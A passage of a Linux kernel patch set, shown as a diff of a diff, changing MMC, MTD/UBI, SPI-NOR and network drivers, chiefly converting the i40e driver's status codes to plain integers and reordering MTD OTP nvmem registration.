+-	 * bit for commands with busy signal. This affects
+-	 * Command Inhibit (data) bit. Just ignore it since
+-	 * MMC core driver has already polled card status
+-	 * with CMD13 after any command with busy siganl.
+-	 */
+-	if ((spec_reg == SDHCI_PRESENT_STATE) &&
+-	(esdhc->quirk_ignore_data_inhibit == true)) {
+-		ret = value & ~SDHCI_DATA_INHIBIT;
+-		return ret;
+-	}
+-
+ 	ret = value;
+ 	return ret;
+ }
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 686ada1a63e9a..24518e5e1b5e4 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -884,8 +884,8 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 
+ 	/* OTP nvmem will be registered on the physical device */
+ 	config.dev = mtd->dev.parent;
+-	config.name = kasprintf(GFP_KERNEL, "%s-%s", dev_name(&mtd->dev), compatible);
+-	config.id = NVMEM_DEVID_NONE;
++	config.name = compatible;
++	config.id = NVMEM_DEVID_AUTO;
+ 	config.owner = THIS_MODULE;
+ 	config.type = NVMEM_TYPE_OTP;
+ 	config.root_only = true;
+@@ -901,7 +901,6 @@ static struct nvmem_device *mtd_otp_nvmem_register(struct mtd_info *mtd,
+ 		nvmem = NULL;
+ 
+ 	of_node_put(np);
+-	kfree(config.name);
+ 
+ 	return nvmem;
+ }
+@@ -936,6 +935,7 @@ static int mtd_nvmem_fact_otp_reg_read(void *priv, unsigned int offset,
+ 
+ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ {
++	struct device *dev = mtd->dev.parent;
+ 	struct nvmem_device *nvmem;
+ 	ssize_t size;
+ 	int err;
+@@ -949,7 +949,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "user-otp", size,
+ 						       mtd_nvmem_user_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				return PTR_ERR(nvmem);
+ 			}
+ 			mtd->otp_user_nvmem = nvmem;
+@@ -967,7 +967,7 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 			nvmem = mtd_otp_nvmem_register(mtd, "factory-otp", size,
+ 						       mtd_nvmem_fact_otp_reg_read);
+ 			if (IS_ERR(nvmem)) {
+-				dev_err(&mtd->dev, "Failed to register OTP NVMEM device\n");
++				dev_err(dev, "Failed to register OTP NVMEM device\n");
+ 				err = PTR_ERR(nvmem);
+ 				goto err;
+ 			}
+@@ -1019,10 +1019,14 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 
+ 	mtd_set_dev_defaults(mtd);
+ 
++	ret = mtd_otp_nvmem_add(mtd);
++	if (ret)
++		goto out;
++
+ 	if (IS_ENABLED(CONFIG_MTD_PARTITIONED_MASTER)) {
+ 		ret = add_mtd_device(mtd);
+ 		if (ret)
+-			return ret;
++			goto out;
+ 	}
+ 
+ 	/* Prefer parsed partitions over driver-provided fallback */
+@@ -1057,9 +1061,12 @@ int mtd_device_parse_register(struct mtd_info *mtd, const char * const *types,
+ 		register_reboot_notifier(&mtd->reboot_notifier);
+ 	}
+ 
+-	ret = mtd_otp_nvmem_add(mtd);
+-
+ out:
++	if (ret) {
++		nvmem_unregister(mtd->otp_user_nvmem);
++		nvmem_unregister(mtd->otp_factory_nvmem);
++	}
++
+ 	if (ret && device_is_registered(&mtd->dev))
+ 		del_mtd_device(mtd);
+ 
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 75e694791d8d9..9a7bea365acb7 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2696,6 +2696,7 @@ static int spi_nor_quad_enable(struct spi_nor *nor)
+ 
+ static int spi_nor_init(struct spi_nor *nor)
+ {
++	struct spi_nor_flash_parameter *params = nor->params;
+ 	int err;
+ 
+ 	err = spi_nor_octal_dtr_enable(nor, true);
+@@ -2737,9 +2738,10 @@ static int spi_nor_init(struct spi_nor *nor)
+ 		 */
+ 		WARN_ONCE(nor->flags & SNOR_F_BROKEN_RESET,
+ 			  "enabling reset hack; may not recover from unexpected reboots\n");
+-		err = nor->params->set_4byte_addr_mode(nor, true);
++		err = params->set_4byte_addr_mode(nor, true);
+ 		if (err && err != -ENOTSUPP)
+ 			return err;
++		params->addr_mode_nbytes = 4;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/mtd/ubi/eba.c b/drivers/mtd/ubi/eba.c
+index 09c408c45a621..4e1d80746b04b 100644
+--- a/drivers/mtd/ubi/eba.c
++++ b/drivers/mtd/ubi/eba.c
+@@ -946,7 +946,7 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ 				  int offset, int len)
+ {
+ 	struct ubi_device *ubi = vol->ubi;
+-	int pnum, opnum, err, vol_id = vol->vol_id;
++	int pnum, opnum, err, err2, vol_id = vol->vol_id;
+ 
+ 	pnum = ubi_wl_get_peb(ubi);
+ 	if (pnum < 0) {
+@@ -981,10 +981,19 @@ static int try_write_vid_and_data(struct ubi_volume *vol, int lnum,
+ out_put:
+ 	up_read(&ubi->fm_eba_sem);
+ 
+-	if (err && pnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
+-	else if (!err && opnum >= 0)
+-		err = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++	if (err && pnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, pnum, 1);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 pnum, err2);
++		}
++	} else if (!err && opnum >= 0) {
++		err2 = ubi_wl_put_peb(ubi, vol_id, lnum, opnum, 0);
++		if (err2) {
++			ubi_warn(ubi, "failed to return physical eraseblock %d, error %d",
++				 opnum, err2);
++		}
++	}
+ 
+ 	return err;
+ }
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index fbcd5c2b13aeb..7a6166a0c9bcc 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -1365,7 +1365,6 @@ static void qca8k_pcs_get_state(struct phylink_pcs *pcs,
+ 
+ 	state->link = !!(reg & QCA8K_PORT_STATUS_LINK_UP);
+ 	state->an_complete = state->link;
+-	state->an_enabled = !!(reg & QCA8K_PORT_STATUS_LINK_AUTO);
+ 	state->duplex = (reg & QCA8K_PORT_STATUS_DUPLEX) ? DUPLEX_FULL :
+ 							   DUPLEX_HALF;
+ 
+diff --git a/drivers/net/ethernet/amd/nmclan_cs.c b/drivers/net/ethernet/amd/nmclan_cs.c
+index 823a329a921f4..0dd391c84c138 100644
+--- a/drivers/net/ethernet/amd/nmclan_cs.c
++++ b/drivers/net/ethernet/amd/nmclan_cs.c
+@@ -651,7 +651,7 @@ static int nmclan_config(struct pcmcia_device *link)
+     } else {
+       pr_notice("mace id not found: %x %x should be 0x40 0x?9\n",
+ 		sig[0], sig[1]);
+-      return -ENODEV;
++      goto failed;
+     }
+   }
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index d8fb7d4ebd51e..981cc32480474 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -283,7 +283,8 @@ static int dpaa_stop(struct net_device *net_dev)
+ {
+ 	struct mac_device *mac_dev;
+ 	struct dpaa_priv *priv;
+-	int i, err, error;
++	int i, error;
++	int err = 0;
+ 
+ 	priv = netdev_priv(net_dev);
+ 	mac_dev = priv->mac_dev;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index 9a60d6b207f7c..a81f918091ccf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -1286,9 +1286,9 @@ void i40e_ptp_stop(struct i40e_pf *pf);
+ int i40e_ptp_alloc_pins(struct i40e_pf *pf);
+ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset);
+ int i40e_is_vsi_uplink_mode_veb(struct i40e_vsi *vsi);
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf);
+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf);
++int i40e_get_partition_bw_setting(struct i40e_pf *pf);
++int i40e_set_partition_bw_setting(struct i40e_pf *pf);
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf);
+ void i40e_print_link_message(struct i40e_vsi *vsi, bool isup);
+ 
+ void i40e_set_fec_in_flags(u8 fec_cfg, u32 *flags);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_adminq.c b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+index 42439f725aa43..86fac8f959bb0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_adminq.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_adminq.c
+@@ -47,9 +47,9 @@ static void i40e_adminq_init_regs(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_asq_ring - Allocate Admin Queue send rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.asq.desc_buf,
+ 					 i40e_mem_atq_ring,
+@@ -74,9 +74,9 @@ static i40e_status i40e_alloc_adminq_asq_ring(struct i40e_hw *hw)
+  *  i40e_alloc_adminq_arq_ring - Allocate Admin Queue receive rings
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
++static int i40e_alloc_adminq_arq_ring(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	ret_code = i40e_allocate_dma_mem(hw, &hw->aq.arq.desc_buf,
+ 					 i40e_mem_arq_ring,
+@@ -115,11 +115,11 @@ static void i40e_free_adminq_arq(struct i40e_hw *hw)
+  *  i40e_alloc_arq_bufs - Allocate pre-posted buffers for the receive queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_arq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_arq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* We'll be allocating the buffer info memory first, then we can
+@@ -182,10 +182,10 @@ unwind_alloc_arq_bufs:
+  *  i40e_alloc_asq_bufs - Allocate empty buffer structs for the send queue
+  *  @hw: pointer to the hardware structure
+  **/
+-static i40e_status i40e_alloc_asq_bufs(struct i40e_hw *hw)
++static int i40e_alloc_asq_bufs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_dma_mem *bi;
++	int ret_code;
+ 	int i;
+ 
+ 	/* No mapped memory needed yet, just the buffer info structures */
+@@ -266,9 +266,9 @@ static void i40e_free_asq_bufs(struct i40e_hw *hw)
+  *
+  *  Configure base address and length registers for the transmit queue
+  **/
+-static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
++static int i40e_config_asq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -295,9 +295,9 @@ static i40e_status i40e_config_asq_regs(struct i40e_hw *hw)
+  *
+  * Configure base address and length registers for the receive (event queue)
+  **/
+-static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
++static int i40e_config_arq_regs(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg = 0;
+ 
+ 	/* Clear Head and Tail */
+@@ -334,9 +334,9 @@ static i40e_status i40e_config_arq_regs(struct i40e_hw *hw)
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_asq(struct i40e_hw *hw)
++static int i40e_init_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.asq.count > 0) {
+ 		/* queue already initialized */
+@@ -393,9 +393,9 @@ init_adminq_exit:
+  *  Do *NOT* hold the lock when calling this as the memory allocation routines
+  *  called are not going to be atomic context safe
+  **/
+-static i40e_status i40e_init_arq(struct i40e_hw *hw)
++static int i40e_init_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->aq.arq.count > 0) {
+ 		/* queue already initialized */
+@@ -445,9 +445,9 @@ init_adminq_exit:
+  *
+  *  The main shutdown routine for the Admin Send Queue
+  **/
+-static i40e_status i40e_shutdown_asq(struct i40e_hw *hw)
++static int i40e_shutdown_asq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 
+@@ -479,9 +479,9 @@ shutdown_asq_out:
+  *
+  *  The main shutdown routine for the Admin Receive Queue
+  **/
+-static i40e_status i40e_shutdown_arq(struct i40e_hw *hw)
++static int i40e_shutdown_arq(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	mutex_lock(&hw->aq.arq_mutex);
+ 
+@@ -582,12 +582,12 @@ static void i40e_set_hw_flags(struct i40e_hw *hw)
+  *     - hw->aq.arq_buf_size
+  *     - hw->aq.asq_buf_size
+  **/
+-i40e_status i40e_init_adminq(struct i40e_hw *hw)
++int i40e_init_adminq(struct i40e_hw *hw)
+ {
+ 	u16 cfg_ptr, oem_hi, oem_lo;
+ 	u16 eetrack_lo, eetrack_hi;
+-	i40e_status ret_code;
+ 	int retry = 0;
++	int ret_code;
+ 
+ 	/* verify input for valid configuration */
+ 	if ((hw->aq.num_arq_entries == 0) ||
+@@ -780,7 +780,7 @@ static bool i40e_asq_done(struct i40e_hw *hw)
+  *  This is the main send command driver routine for the Admin Queue send
+  *  queue.  It runs the queue, cleans the queue, etc
+  **/
+-static i40e_status
++static int
+ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_aq_desc *desc,
+ 				  void *buff, /* can be NULL */
+@@ -788,12 +788,12 @@ i40e_asq_send_command_atomic_exec(struct i40e_hw *hw,
+ 				  struct i40e_asq_cmd_details *cmd_details,
+ 				  bool is_atomic_context)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_dma_mem *dma_buff = NULL;
+ 	struct i40e_asq_cmd_details *details;
+ 	struct i40e_aq_desc *desc_on_ring;
+ 	bool cmd_completed = false;
+ 	u16  retval = 0;
++	int status = 0;
+ 	u32  val = 0;
+ 
+ 	if (hw->aq.asq.count == 0) {
+@@ -984,7 +984,7 @@ asq_send_command_error:
+  *  Acquires the lock and calls the main send command execution
+  *  routine.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */
+@@ -992,7 +992,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff, buff_size,
+@@ -1003,7 +1003,7 @@ i40e_asq_send_command_atomic(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details)
+@@ -1026,7 +1026,7 @@ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+  *  routine. Returns the last Admin Queue status in aq_status
+  *  to avoid race conditions in access to hw->aq.asq_last_status.
+  **/
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -1035,7 +1035,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				bool is_atomic_context,
+ 				enum i40e_admin_queue_err *aq_status)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	mutex_lock(&hw->aq.asq_mutex);
+ 	status = i40e_asq_send_command_atomic_exec(hw, desc, buff,
+@@ -1048,7 +1048,7 @@ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */ u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+@@ -1084,14 +1084,14 @@ void i40e_fill_default_direct_cmd_desc(struct i40e_aq_desc *desc,
+  *  the contents through e.  It can also return how many events are
+  *  left to process through 'pending'
+  **/
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *pending)
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *pending)
+ {
+-	i40e_status ret_code = 0;
+ 	u16 ntc = hw->aq.arq.next_to_clean;
+ 	struct i40e_aq_desc *desc;
+ 	struct i40e_dma_mem *bi;
++	int ret_code = 0;
+ 	u16 desc_idx;
+ 	u16 datalen;
+ 	u16 flags;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_alloc.h b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+index cb8689222c8b7..a6c9a9e343d11 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_alloc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_alloc.h
+@@ -20,16 +20,16 @@ enum i40e_memory_type {
+ };
+ 
+ /* prototype for functions used for dynamic memory allocation */
+-i40e_status i40e_allocate_dma_mem(struct i40e_hw *hw,
+-					    struct i40e_dma_mem *mem,
+-					    enum i40e_memory_type type,
+-					    u64 size, u32 alignment);
+-i40e_status i40e_free_dma_mem(struct i40e_hw *hw,
+-					struct i40e_dma_mem *mem);
+-i40e_status i40e_allocate_virt_mem(struct i40e_hw *hw,
+-					     struct i40e_virt_mem *mem,
+-					     u32 size);
+-i40e_status i40e_free_virt_mem(struct i40e_hw *hw,
+-					 struct i40e_virt_mem *mem);
++int i40e_allocate_dma_mem(struct i40e_hw *hw,
++			  struct i40e_dma_mem *mem,
++			  enum i40e_memory_type type,
++			  u64 size, u32 alignment);
++int i40e_free_dma_mem(struct i40e_hw *hw,
++		      struct i40e_dma_mem *mem);
++int i40e_allocate_virt_mem(struct i40e_hw *hw,
++			   struct i40e_virt_mem *mem,
++			   u32 size);
++int i40e_free_virt_mem(struct i40e_hw *hw,
++		       struct i40e_virt_mem *mem);
+ 
+ #endif /* _I40E_ALLOC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_client.c b/drivers/net/ethernet/intel/i40e/i40e_client.c
+index 10d7a982a5b9b..8bcb98b85e3d9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_client.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_client.c
+@@ -541,7 +541,7 @@ static int i40e_client_virtchnl_send(struct i40e_info *ldev,
+ {
+ 	struct i40e_pf *pf = ldev->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
++	int err;
+ 
+ 	err = i40e_aq_send_msg_to_vf(hw, vf_id, VIRTCHNL_OP_IWARP,
+ 				     0, msg, len, NULL);
+@@ -674,7 +674,7 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_vsi_context ctxt;
+ 	bool update = true;
+-	i40e_status err;
++	int err;
+ 
+ 	/* TODO: for now do not allow setting VF's VSI setting */
+ 	if (is_vf)
+@@ -686,8 +686,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -714,8 +714,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 		err = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 		if (err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "update VSI ctxt for PE failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "update VSI ctxt for PE failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_common.c b/drivers/net/ethernet/intel/i40e/i40e_common.c
+index 4f01e2a6b6bbf..82e06272158df 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_common.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_common.c
+@@ -14,9 +14,9 @@
+  * This function sets the mac type of the adapter based on the
+  * vendor ID and device ID stored in the hw structure.
+  **/
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw)
++int i40e_set_mac_type(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	if (hw->vendor_id == PCI_VENDOR_ID_INTEL) {
+ 		switch (hw->device_id) {
+@@ -124,154 +124,6 @@ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err)
+ 	return hw->err_str;
+ }
+ 
+-/**
+- * i40e_stat_str - convert status err code to a string
+- * @hw: pointer to the HW structure
+- * @stat_err: the status error code to convert
+- **/
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err)
+-{
+-	switch (stat_err) {
+-	case 0:
+-		return "OK";
+-	case I40E_ERR_NVM:
+-		return "I40E_ERR_NVM";
+-	case I40E_ERR_NVM_CHECKSUM:
+-		return "I40E_ERR_NVM_CHECKSUM";
+-	case I40E_ERR_PHY:
+-		return "I40E_ERR_PHY";
+-	case I40E_ERR_CONFIG:
+-		return "I40E_ERR_CONFIG";
+-	case I40E_ERR_PARAM:
+-		return "I40E_ERR_PARAM";
+-	case I40E_ERR_MAC_TYPE:
+-		return "I40E_ERR_MAC_TYPE";
+-	case I40E_ERR_UNKNOWN_PHY:
+-		return "I40E_ERR_UNKNOWN_PHY";
+-	case I40E_ERR_LINK_SETUP:
+-		return "I40E_ERR_LINK_SETUP";
+-	case I40E_ERR_ADAPTER_STOPPED:
+-		return "I40E_ERR_ADAPTER_STOPPED";
+-	case I40E_ERR_INVALID_MAC_ADDR:
+-		return "I40E_ERR_INVALID_MAC_ADDR";
+-	case I40E_ERR_DEVICE_NOT_SUPPORTED:
+-		return "I40E_ERR_DEVICE_NOT_SUPPORTED";
+-	case I40E_ERR_PRIMARY_REQUESTS_PENDING:
+-		return "I40E_ERR_PRIMARY_REQUESTS_PENDING";
+-	case I40E_ERR_INVALID_LINK_SETTINGS:
+-		return "I40E_ERR_INVALID_LINK_SETTINGS";
+-	case I40E_ERR_AUTONEG_NOT_COMPLETE:
+-		return "I40E_ERR_AUTONEG_NOT_COMPLETE";
+-	case I40E_ERR_RESET_FAILED:
+-		return "I40E_ERR_RESET_FAILED";
+-	case I40E_ERR_SWFW_SYNC:
+-		return "I40E_ERR_SWFW_SYNC";
+-	case I40E_ERR_NO_AVAILABLE_VSI:
+-		return "I40E_ERR_NO_AVAILABLE_VSI";
+-	case I40E_ERR_NO_MEMORY:
+-		return "I40E_ERR_NO_MEMORY";
+-	case I40E_ERR_BAD_PTR:
+-		return "I40E_ERR_BAD_PTR";
+-	case I40E_ERR_RING_FULL:
+-		return "I40E_ERR_RING_FULL";
+-	case I40E_ERR_INVALID_PD_ID:
+-		return "I40E_ERR_INVALID_PD_ID";
+-	case I40E_ERR_INVALID_QP_ID:
+-		return "I40E_ERR_INVALID_QP_ID";
+-	case I40E_ERR_INVALID_CQ_ID:
+-		return "I40E_ERR_INVALID_CQ_ID";
+-	case I40E_ERR_INVALID_CEQ_ID:
+-		return "I40E_ERR_INVALID_CEQ_ID";
+-	case I40E_ERR_INVALID_AEQ_ID:
+-		return "I40E_ERR_INVALID_AEQ_ID";
+-	case I40E_ERR_INVALID_SIZE:
+-		return "I40E_ERR_INVALID_SIZE";
+-	case I40E_ERR_INVALID_ARP_INDEX:
+-		return "I40E_ERR_INVALID_ARP_INDEX";
+-	case I40E_ERR_INVALID_FPM_FUNC_ID:
+-		return "I40E_ERR_INVALID_FPM_FUNC_ID";
+-	case I40E_ERR_QP_INVALID_MSG_SIZE:
+-		return "I40E_ERR_QP_INVALID_MSG_SIZE";
+-	case I40E_ERR_QP_TOOMANY_WRS_POSTED:
+-		return "I40E_ERR_QP_TOOMANY_WRS_POSTED";
+-	case I40E_ERR_INVALID_FRAG_COUNT:
+-		return "I40E_ERR_INVALID_FRAG_COUNT";
+-	case I40E_ERR_QUEUE_EMPTY:
+-		return "I40E_ERR_QUEUE_EMPTY";
+-	case I40E_ERR_INVALID_ALIGNMENT:
+-		return "I40E_ERR_INVALID_ALIGNMENT";
+-	case I40E_ERR_FLUSHED_QUEUE:
+-		return "I40E_ERR_FLUSHED_QUEUE";
+-	case I40E_ERR_INVALID_PUSH_PAGE_INDEX:
+-		return "I40E_ERR_INVALID_PUSH_PAGE_INDEX";
+-	case I40E_ERR_INVALID_IMM_DATA_SIZE:
+-		return "I40E_ERR_INVALID_IMM_DATA_SIZE";
+-	case I40E_ERR_TIMEOUT:
+-		return "I40E_ERR_TIMEOUT";
+-	case I40E_ERR_OPCODE_MISMATCH:
+-		return "I40E_ERR_OPCODE_MISMATCH";
+-	case I40E_ERR_CQP_COMPL_ERROR:
+-		return "I40E_ERR_CQP_COMPL_ERROR";
+-	case I40E_ERR_INVALID_VF_ID:
+-		return "I40E_ERR_INVALID_VF_ID";
+-	case I40E_ERR_INVALID_HMCFN_ID:
+-		return "I40E_ERR_INVALID_HMCFN_ID";
+-	case I40E_ERR_BACKING_PAGE_ERROR:
+-		return "I40E_ERR_BACKING_PAGE_ERROR";
+-	case I40E_ERR_NO_PBLCHUNKS_AVAILABLE:
+-		return "I40E_ERR_NO_PBLCHUNKS_AVAILABLE";
+-	case I40E_ERR_INVALID_PBLE_INDEX:
+-		return "I40E_ERR_INVALID_PBLE_INDEX";
+-	case I40E_ERR_INVALID_SD_INDEX:
+-		return "I40E_ERR_INVALID_SD_INDEX";
+-	case I40E_ERR_INVALID_PAGE_DESC_INDEX:
+-		return "I40E_ERR_INVALID_PAGE_DESC_INDEX";
+-	case I40E_ERR_INVALID_SD_TYPE:
+-		return "I40E_ERR_INVALID_SD_TYPE";
+-	case I40E_ERR_MEMCPY_FAILED:
+-		return "I40E_ERR_MEMCPY_FAILED";
+-	case I40E_ERR_INVALID_HMC_OBJ_INDEX:
+-		return "I40E_ERR_INVALID_HMC_OBJ_INDEX";
+-	case I40E_ERR_INVALID_HMC_OBJ_COUNT:
+-		return "I40E_ERR_INVALID_HMC_OBJ_COUNT";
+-	case I40E_ERR_INVALID_SRQ_ARM_LIMIT:
+-		return "I40E_ERR_INVALID_SRQ_ARM_LIMIT";
+-	case I40E_ERR_SRQ_ENABLED:
+-		return "I40E_ERR_SRQ_ENABLED";
+-	case I40E_ERR_ADMIN_QUEUE_ERROR:
+-		return "I40E_ERR_ADMIN_QUEUE_ERROR";
+-	case I40E_ERR_ADMIN_QUEUE_TIMEOUT:
+-		return "I40E_ERR_ADMIN_QUEUE_TIMEOUT";
+-	case I40E_ERR_BUF_TOO_SHORT:
+-		return "I40E_ERR_BUF_TOO_SHORT";
+-	case I40E_ERR_ADMIN_QUEUE_FULL:
+-		return "I40E_ERR_ADMIN_QUEUE_FULL";
+-	case I40E_ERR_ADMIN_QUEUE_NO_WORK:
+-		return "I40E_ERR_ADMIN_QUEUE_NO_WORK";
+-	case I40E_ERR_BAD_IWARP_CQE:
+-		return "I40E_ERR_BAD_IWARP_CQE";
+-	case I40E_ERR_NVM_BLANK_MODE:
+-		return "I40E_ERR_NVM_BLANK_MODE";
+-	case I40E_ERR_NOT_IMPLEMENTED:
+-		return "I40E_ERR_NOT_IMPLEMENTED";
+-	case I40E_ERR_PE_DOORBELL_NOT_ENABLED:
+-		return "I40E_ERR_PE_DOORBELL_NOT_ENABLED";
+-	case I40E_ERR_DIAG_TEST_FAILED:
+-		return "I40E_ERR_DIAG_TEST_FAILED";
+-	case I40E_ERR_NOT_READY:
+-		return "I40E_ERR_NOT_READY";
+-	case I40E_NOT_SUPPORTED:
+-		return "I40E_NOT_SUPPORTED";
+-	case I40E_ERR_FIRMWARE_API_VERSION:
+-		return "I40E_ERR_FIRMWARE_API_VERSION";
+-	case I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR:
